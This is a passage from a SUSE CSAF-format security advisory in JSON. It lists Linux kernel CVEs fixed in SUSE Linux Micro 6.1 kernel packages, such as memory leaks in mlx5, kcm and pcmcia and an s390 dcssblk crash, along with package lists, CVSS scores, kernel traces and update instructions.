"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54104"
},
{
"cve": "CVE-2023-54106",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54106"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5: fix potential memory leak in mlx5e_init_rep_rx\n\nThe memory pointed to by the priv-\u003erx_res pointer is not freed in the error\npath of mlx5e_init_rep_rx, which can lead to a memory leak. Fix by freeing\nthe memory in the error path, thereby making the error path identical to\nmlx5e_cleanup_rep_rx().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54106",
"url": "https://www.suse.com/security/cve/CVE-2023-54106"
},
{
"category": "external",
"summary": "SUSE Bug 1256358 for CVE-2023-54106",
"url": "https://bugzilla.suse.com/1256358"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54106"
},
{
"cve": "CVE-2023-54112",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54112"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nkcm: Fix memory leak in error path of kcm_sendmsg()\n\nsyzbot reported a memory leak like below:\n\nBUG: memory leak\nunreferenced object 0xffff88810b088c00 (size 240):\n comm \"syz-executor186\", pid 5012, jiffies 4294943306 (age 13.680s)\n hex dump (first 32 bytes):\n 00 89 08 0b 81 88 ff ff 00 00 00 00 00 00 00 00 ................\n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n backtrace:\n [\u003cffffffff83e5d5ff\u003e] __alloc_skb+0x1ef/0x230 net/core/skbuff.c:634\n [\u003cffffffff84606e59\u003e] alloc_skb include/linux/skbuff.h:1289 [inline]\n [\u003cffffffff84606e59\u003e] kcm_sendmsg+0x269/0x1050 net/kcm/kcmsock.c:815\n [\u003cffffffff83e479c6\u003e] sock_sendmsg_nosec net/socket.c:725 [inline]\n [\u003cffffffff83e479c6\u003e] sock_sendmsg+0x56/0xb0 net/socket.c:748\n [\u003cffffffff83e47f55\u003e] ____sys_sendmsg+0x365/0x470 net/socket.c:2494\n [\u003cffffffff83e4c389\u003e] ___sys_sendmsg+0xc9/0x130 net/socket.c:2548\n [\u003cffffffff83e4c536\u003e] __sys_sendmsg+0xa6/0x120 net/socket.c:2577\n [\u003cffffffff84ad7bb8\u003e] do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n [\u003cffffffff84ad7bb8\u003e] do_syscall_64+0x38/0xb0 arch/x86/entry/common.c:80\n [\u003cffffffff84c0008b\u003e] entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nIn kcm_sendmsg(), kcm_tx_msg(head)-\u003elast_skb is used as a cursor to append\nnewly allocated skbs to \u0027head\u0027. If some bytes are copied, an error occurred,\nand jumped to out_error label, \u0027last_skb\u0027 is left unmodified. A later\nkcm_sendmsg() will use an obsoleted \u0027last_skb\u0027 reference, corrupting the\n\u0027head\u0027 frag_list and causing the leak.\n\nThis patch fixes this issue by properly updating the last allocated skb in\n\u0027last_skb\u0027.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54112",
"url": "https://www.suse.com/security/cve/CVE-2023-54112"
},
{
"category": "external",
"summary": "SUSE Bug 1256354 for CVE-2023-54112",
"url": "https://bugzilla.suse.com/1256354"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54112"
},
{
"cve": "CVE-2023-54113",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54113"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nrcu: dump vmalloc memory info safely\n\nCurrently, for double invoke call_rcu(), will dump rcu_head objects memory\ninfo, if the objects is not allocated from the slab allocator, the\nvmalloc_dump_obj() will be invoke and the vmap_area_lock spinlock need to\nbe held, since the call_rcu() can be invoked in interrupt context,\ntherefore, there is a possibility of spinlock deadlock scenarios.\n\nAnd in Preempt-RT kernel, the rcutorture test also trigger the following\nlockdep warning:\n\nBUG: sleeping function called from invalid context at kernel/locking/spinlock_rt.c:48\nin_atomic(): 1, irqs_disabled(): 1, non_block: 0, pid: 1, name: swapper/0\npreempt_count: 1, expected: 0\nRCU nest depth: 1, expected: 1\n3 locks held by swapper/0/1:\n #0: ffffffffb534ee80 (fullstop_mutex){+.+.}-{4:4}, at: torture_init_begin+0x24/0xa0\n #1: ffffffffb5307940 (rcu_read_lock){....}-{1:3}, at: rcu_torture_init+0x1ec7/0x2370\n #2: ffffffffb536af40 (vmap_area_lock){+.+.}-{3:3}, at: find_vmap_area+0x1f/0x70\nirq event stamp: 565512\nhardirqs last enabled at (565511): [\u003cffffffffb379b138\u003e] __call_rcu_common+0x218/0x940\nhardirqs last disabled at (565512): [\u003cffffffffb5804262\u003e] rcu_torture_init+0x20b2/0x2370\nsoftirqs last enabled at (399112): [\u003cffffffffb36b2586\u003e] __local_bh_enable_ip+0x126/0x170\nsoftirqs last disabled at (399106): [\u003cffffffffb43fef59\u003e] inet_register_protosw+0x9/0x1d0\nPreemption disabled at:\n[\u003cffffffffb58040c3\u003e] rcu_torture_init+0x1f13/0x2370\nCPU: 0 PID: 1 Comm: swapper/0 Tainted: G W 6.5.0-rc4-rt2-yocto-preempt-rt+ #15\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.16.2-0-gea1b7a073390-prebuilt.qemu.org 04/01/2014\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x68/0xb0\n dump_stack+0x14/0x20\n __might_resched+0x1aa/0x280\n ? __pfx_rcu_torture_err_cb+0x10/0x10\n rt_spin_lock+0x53/0x130\n ? find_vmap_area+0x1f/0x70\n find_vmap_area+0x1f/0x70\n vmalloc_dump_obj+0x20/0x60\n mem_dump_obj+0x22/0x90\n __call_rcu_common+0x5bf/0x940\n ? debug_smp_processor_id+0x1b/0x30\n call_rcu_hurry+0x14/0x20\n rcu_torture_init+0x1f82/0x2370\n ? __pfx_rcu_torture_leak_cb+0x10/0x10\n ? __pfx_rcu_torture_leak_cb+0x10/0x10\n ? __pfx_rcu_torture_init+0x10/0x10\n do_one_initcall+0x6c/0x300\n ? debug_smp_processor_id+0x1b/0x30\n kernel_init_freeable+0x2b9/0x540\n ? __pfx_kernel_init+0x10/0x10\n kernel_init+0x1f/0x150\n ret_from_fork+0x40/0x50\n ? __pfx_kernel_init+0x10/0x10\n ret_from_fork_asm+0x1b/0x30\n \u003c/TASK\u003e\n\nThe previous patch fixes this by using the deadlock-safe best-effort\nversion of find_vm_area. However, in case of failure print the fact that\nthe pointer was a vmalloc pointer so that we print at least something.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54113",
"url": "https://www.suse.com/security/cve/CVE-2023-54113"
},
{
"category": "external",
"summary": "SUSE Bug 1256351 for CVE-2023-54113",
"url": "https://bugzilla.suse.com/1256351"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54113"
},
{
"cve": "CVE-2023-54115",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54115"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npcmcia: rsrc_nonstatic: Fix memory leak in nonstatic_release_resource_db()\n\nWhen nonstatic_release_resource_db() frees all resources associated\nwith an PCMCIA socket, it forgets to free socket_data too, causing\na memory leak observable with kmemleak:\n\nunreferenced object 0xc28d1000 (size 64):\n comm \"systemd-udevd\", pid 297, jiffies 4294898478 (age 194.484s)\n hex dump (first 32 bytes):\n 00 00 00 00 00 00 00 00 f0 85 0e c3 00 00 00 00 ................\n 00 00 00 00 0c 10 8d c2 00 00 00 00 00 00 00 00 ................\n backtrace:\n [\u003cffda4245\u003e] __kmem_cache_alloc_node+0x2d7/0x4a0\n [\u003c7e51f0c8\u003e] kmalloc_trace+0x31/0xa4\n [\u003cd52b4ca0\u003e] nonstatic_init+0x24/0x1a4 [pcmcia_rsrc]\n [\u003ca2f13e08\u003e] pcmcia_register_socket+0x200/0x35c [pcmcia_core]\n [\u003ca728be1b\u003e] yenta_probe+0x4d8/0xa70 [yenta_socket]\n [\u003cc48fac39\u003e] pci_device_probe+0x99/0x194\n [\u003c84b7c690\u003e] really_probe+0x181/0x45c\n [\u003c8060fe6e\u003e] __driver_probe_device+0x75/0x1f4\n [\u003cb9b76f43\u003e] driver_probe_device+0x28/0xac\n [\u003c648b766f\u003e] __driver_attach+0xeb/0x1e4\n [\u003c6e9659eb\u003e] bus_for_each_dev+0x61/0xb4\n [\u003c25a669f3\u003e] driver_attach+0x1e/0x28\n [\u003cd8671d6b\u003e] bus_add_driver+0x102/0x20c\n [\u003cdf0d323c\u003e] driver_register+0x5b/0x120\n [\u003c942cd8a4\u003e] __pci_register_driver+0x44/0x4c\n [\u003ce536027e\u003e] __UNIQUE_ID___addressable_cleanup_module188+0x1c/0xfffff000 [iTCO_vendor_support]\n\nFix this by freeing socket_data too.\n\nTested on a Acer Travelmate 4002WLMi by manually binding/unbinding\nthe yenta_cardbus driver (yenta_socket).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54115",
"url": "https://www.suse.com/security/cve/CVE-2023-54115"
},
{
"category": "external",
"summary": "SUSE Bug 1256121 for CVE-2023-54115",
"url": "https://bugzilla.suse.com/1256121"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54115"
},
{
"cve": "CVE-2023-54117",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54117"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ns390/dcssblk: fix kernel crash with list_add corruption\n\nCommit fb08a1908cb1 (\"dax: simplify the dax_device \u003c-\u003e gendisk\nassociation\") introduced new logic for gendisk association, requiring\ndrivers to explicitly call dax_add_host() and dax_remove_host().\n\nFor dcssblk driver, some dax_remove_host() calls were missing, e.g. in\ndevice remove path. The commit also broke error handling for out_dax case\nin device add path, resulting in an extra put_device() w/o the previous\nget_device() in that case.\n\nThis lead to stale xarray entries after device add / remove cycles. In the\ncase when a previously used struct gendisk pointer (xarray index) would be\nused again, because blk_alloc_disk() happened to return such a pointer, the\nxa_insert() in dax_add_host() would fail and go to out_dax, doing the extra\nput_device() in the error path. In combination with an already flawed error\nhandling in dcssblk (device_register() cleanup), which needs to be\naddressed in a separate patch, this resulted in a missing device_del() /\nklist_del(), and eventually in the kernel crash with list_add corruption on\na subsequent device_add() / klist_add().\n\nFix this by adding the missing dax_remove_host() calls, and also move the\nput_device() in the error path to restore the previous logic.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
